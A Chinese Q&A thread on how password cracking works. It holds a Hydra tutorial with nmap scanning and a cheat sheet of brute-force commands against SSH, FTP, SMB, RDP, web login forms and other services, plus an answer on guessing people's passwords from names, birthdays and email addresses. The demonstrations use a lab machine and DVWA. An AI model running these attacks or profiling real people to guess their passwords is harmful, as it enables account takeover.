標籤:

黑客破解密碼的原理是什麼?

我下載了一個WIFI密碼破解器,貌似它就是在從00000000試到999999999。密碼破解的真正原理是什麼呢?


有人介紹了這麼多原理,我就來介紹工具好啦!

黑客破解工具Hydra在線爆破密碼

這款暴力密碼破解工具相當強大,支持幾乎所有協議的在線密碼破解,其密碼能否被破解關鍵在於字典是否足夠強大。對於社會工程型滲透來說,有時能夠得到事半功倍的效果。

hydra是著名黑客組織thc的一款開源的暴力密碼破解工具,可以在線破解多種密碼

hydra 是一款強大的,在線密碼破解工具。它支持Linux和Windows密碼的破解,同時也支持許多服務的登錄密碼破解。除此之外,它還可以進行,基於表單登陸的密碼破解。下面,讓我們看看如何使用該工具。

官網個版本下載(部分地區打不開的自己翻牆)

Home:https://www.thc.org/thc-hydra/

Windows:https://github.com/maaaaz/thc-hydra-windows

Linux:https://github.com/vanhauser-thc/thc-hydra

更多版本工具獲取 黑協十五周年紀念優盤裡頭有。https://shop260083730.taobao.com

首先,我們來看看hydra的幫助文檔。終端輸入命令:

hydra -h

我們可以看到他支持的破解服務非常多。例如:rdp,ftp,Cisco等。

現在,我以我物理機win10進行破解演示。我先win10上設置一個用戶名為 admin 登錄密碼也為 admin 的用戶。

現在回到Kali上。我用 nmap 對這台伺服器上開放的埠進行掃描。輸入命令:

nmap -p 1-1000 192.168.1.100

通過 nmap 的掃描,我們可以看到開放了很多危險埠。

現在,讓我們嘗試進行 smb 服務的破解。輸入命令:

hydra -l admin -P pass.txt smb://192.168.1.100

-l: 用戶名。

-P: 密碼字典。

-t: 代表線程數。過大的線程,極易導致hydra的奔潰。

-vV: 顯示詳細過程

可以看到很快我們就獲得了密碼:admin admin 。

我們可以看到密碼為 12345678 。

hydra不僅支持命令操作,它還支持圖形化界面。輸入命令: xhydra 就可以打開它的圖形界面了。操作和命令是一樣的。

最後為大家介紹下表單的破解。我們以 DVWA為例。DVWA是以 post 方式進行提交的。我們輸入以下命令:hydra -l admin -P pass.txt 192.168.30.128 http-post-form「/dvwa/login.php:username=^USER^password=^PASS^Login=login:S=index.php」 -t 1 -vV

http-post-form : 表單提交方式。

「/dvwa/login.php:username=^USER^password=^PASS^Login=login:S=index.php」 這一串代表的是post 提交時的數據。

S 表示成功登錄時的特徵。很快密碼也被破解了出來。

密碼: password 。

可以看出,用hydra破解表單密碼是非常複雜的。因此,建議破此類密碼可以用其它工具。

1、破解ssh:

hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip ssh
hydra -l 用戶名 -p 密碼字典 -t 線程 -o save.log -vV ip ssh

2、破解ftp:

hydra ip ftp -l 用戶名 -P 密碼字典 -t 線程(默認16) -vV
hydra ip ftp -l 用戶名 -P 密碼字典 -e ns -vV

3、get方式提交,破解web登錄:

hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip http-get /admin/
hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns -f ip http-get /admin/index.php

4、post方式提交,破解web登錄:

hydra -l 用戶名 -P 密碼字典 -s 80 ip

http-post-form "/admin/login.php:username=^USER^password=^PASS^submit=login:sorry password"

(參數說明:-t同時線程數3,-l用戶名是admin,字典pass.txt,保存為out.txt,-f 當破解了一個密碼就停止, 10.36.16.18目標ip,http-post-form表示破解是採用http的post方式提交的表單密碼破解,&中的內容是表示錯誤猜解的返回信息提示。)

5、破解https:

hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https

6、破解teamspeak:

hydra -l 用戶名 -P 密碼字典 -s 埠號 -vV ip teamspeak

7、破解cisco:

hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

8、破解smb:

hydra -l administrator -P pass.txt 10.36.16.18 smb

9、破解pop3:

hydra -l muts -P pass.txt my.pop3.mail pop3

10、破解rdp:

hydra ip rdp -l administrator -P pass.txt -V

11、破解http-proxy:

hydra -l admin -P pass.txt http-proxy://10.36.16.18

12、破解imap:

hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

更多乾貨學習,關注「合天智匯」公眾號喲!


你問的太籠統

所謂的密碼破解,列舉幾種:

1.wifi密碼、word、rar這種,主要是窮舉,就是暴力破解,一共八位,已計算機這樣的性能,暴力破起來也不難

2.普通解密,有明確加密演算法並且可逆的加密密文,直接用演算法算出來

3.大數據破解,撞庫,比如md5加密的破解

4.利用演算法漏洞,比如某些軟體的加密,用漏洞(具體是啥漏洞就不能一概而論了)

最後~~不要小看暴力破解窮舉法,理論上這種方法是萬能且一定可以破解出密文的


密碼心理學就是從用戶的心理入手,分析對方心理,從而更快的破解出密碼。掌握好可以快速破解、縮短破解時間,獲得用戶信息,這裡說的破解都只是在指黑客破解密碼,而不是軟體的註冊破解。

分析一下,主要考慮下面的心理原則:

一、對中國人來說,一般都沒有英文名的習慣,好像我就沒有英文名,所以中文拼音很多人用來做密碼,一般人去論壇什麼對方註冊一個用戶名,由於一般簡稱很容易給人家搶了,所以一般也就是用全稱。好像我的cyh是簡稱一般給人家註冊了,caiyihao就很少人用。這裡說的是名,如果是密碼,一般要倒過來考慮,一般是先從簡稱再全稱,理由很簡單:短,輸入時間快。

二、數字也是用得很多的,我想用得最多的密碼是:123,123456(因為一般我們的習慣是六位數字,包括銀行的存摺都是六位,論壇一般最低要求六位,注意這點),試一下QQ的密碼,其實不少人是這樣的。特別是新手。一般人密碼是三位或者是六位。下面一些也是常用的:1,11,111,123,168,1314,520(特殊意義的數字),……

三、生日用得特別多,有人把存摺和身份證放一起丟了,給盜賊用他的生日拿到了錢。這個是由於人們怕忘記,而自己的生日是不會忘記的,所以就用了的原因。由於上面說到的六位,所以剛剛好可以這樣790102,在用戶看來剛好省事,不知道:最方便就是最危險。一般人用是這樣的習慣:六位就是790102,四位是7912。如果那個月和日是只有一位的,也就是1~9,一般人就是用四位的,如:7632,而不是760302,如果日期是雙位的,10~31,一般人也就是用到六位而不會是五位,如:760321而不是76321。如果月是雙位,一般日就是雙位的,如:761203,而一般不是76123。說得夠羅索了吧,呵呵,總體來說也就是月和日都是同樣位數的。因為這樣比較美觀。也有人不用日,只用到月,如:763,而對中國人來說7603用得少,因為看起來0是多餘的。

四、我想:一個做暴力破解機軟體的人,只要他思考過,而且技術上能達到的話,一般破解應該按照這個順序來:數字→字母→特殊符號。對方用戶名一般不用大寫字,都是小寫的多。例如我就是用cyh比CYH多,而且用caiyihao而從來不用CAIYIHAO。密碼就要考慮大小寫。理論上也應該按照先小寫再大寫來。因為用戶輸入大寫字一般人不是按shift鍵而是按caps lock鍵,所以理論上來說一般是要大寫所有字母幾個都大寫。

五、做一個黑客就是要從細微入手分析用戶的信息。電子郵箱入手的話可以知道一些什麼呢?例如:

caiyihao@163.com可以知道一些什麼呢?可以看出來是對方是用拼音的用戶名,所以對方應該姓蔡。

cyh790101@163.com還可以知道一些什麼呢?對方生日:790101。當然也可以從主頁看出來,例如:www.****.com,很明顯的。還可以由一個人昵稱推知名或者姓,例如我的QQ昵稱「浩」,很明顯我的名有「浩」字,獲得信息還有很多途徑的,用得多是搜索引擎,建議最少用兩個,搜可以用他的名搜,也可以用他的郵箱搜,也可以用他的文章搜等等。平時應該多一些常識,例如對方QQ上寫了「廣東dg」,結合地理就應該知道是「廣東東莞」。至於由對方聊天內容看出對方男女性別、大概多大、是否還讀書、是否獨生子女、在家裡兄弟姐妹中排老大還是最小,這些就不是本文所要涉及的。

總之:細心觀察; 設身處地,從對方入手; 動腦筋,「書是死的,人是活的」。用方法,可以不用工具就可以破解掉一些密碼了。一般人的密碼不會超過3個的,即使他有過很多個,最後也會縮小到2、3個的。而且一般人的所有郵箱密碼都基本一樣的,論壇註冊的密碼也都一樣的,所以破解了一個也就可以得到很多個地方的密碼了。駭客說 - 駭客技術學習


我知道的形式有幾種:

1 暴力。。。(不是膜!)破解

2 社工庫、撞庫

3 根據你已經泄露的其他信息猜(姓名、生日、手機號等),比如某某某的手機號是10086,那麼他的密碼可能是xxx10086或者是xxx19980101這樣的

4 木馬盜取(遊戲外掛可能會盯著你的按鍵輸入,特別是靠按鍵來激活功能的外掛,一般都會創建一個新的輸入法,說是方便按鍵開啟外掛功能,實際上是會偷窺鍵盤輸入的)

5 假官網盜取(4和5都是讓你心甘情願輸入密碼的,5是假手機、遊戲、購物網站)


推薦閱讀:

互聯網產品如何做好「用戶密碼找回」功能?便利性和安全性如何平衡取捨?
hash與消息摘要的關係是什麼?
拉杆箱密碼忘記了怎麼辦?
2436 926 246 742 24這串密碼有什麼含義?
解密單表代換密碼?

TAG:密碼 |